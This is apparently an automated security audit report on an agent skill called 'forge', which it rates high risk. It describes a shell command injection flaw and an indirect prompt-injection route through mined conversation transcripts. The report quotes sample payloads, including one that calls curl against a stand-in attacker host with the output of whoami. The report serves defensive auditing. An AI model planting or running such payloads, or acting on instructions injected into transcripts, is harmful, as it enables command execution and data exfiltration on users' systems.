forge (skills/boshu2/agentops/forge)

Audit result: Fail

Audited by Gen Agent Trust Hub on Apr 5, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION

Full Analysis
  • [COMMAND_EXECUTION]: A command injection vulnerability exists in the shell logic within SKILL.md (Manual Execution, Step 4). The script extracts a value from a file using awk and interpolates it into an echo command: $(echo "$CONF_NUM >= 0.7" | bc -l). Because the shell expands variables before execution, a specially crafted string containing shell metacharacters (e.g., "; id; #) in the CONF_NUM variable will result in arbitrary command execution.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection. It is designed to "mine transcripts" (untrusted, user-controlled data) for knowledge. An attacker can embed malicious instructions or formatted strings (e.g., Confidence: 0.9"; curl http://attacker.com/$(whoami); ") in a conversation. The agent, following its instructions to extract confidence scores, will write this malicious payload into a .agents/forge/ file, which is then processed by the vulnerable shell script.
  • [DATA_EXFILTRATION]: While the skill does not contain explicit exfiltration code, the command injection vulnerability in the indexing/promotion step provides a direct primitive for an attacker to read sensitive local files and exfiltrate them via common tools like curl or wget.
  • [INDIRECT_PROMPT_INJECTION]: Mandatory Evidence Chain:
      ◦ Ingestion points: Untrusted conversation transcripts are read in SKILL.md (Steps 1 and 2).
      ◦ Boundary markers: Absent. No delimiters or warnings are used to prevent the agent from treating malicious text within the transcript as valid data to be extracted.
      ◦ Capability inventory: The skill performs shell command execution (bc, echo, cat, sed, date, mkdir) and file writes (.agents/learnings/, .agents/ao/search-index.jsonl) in SKILL.md (Steps 4 and 5).
      ◦ Sanitization: None. The extracted CONF_NUM value is used directly in a shell interpolation without escaping or validation.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Apr 5, 2026, 11:07 PM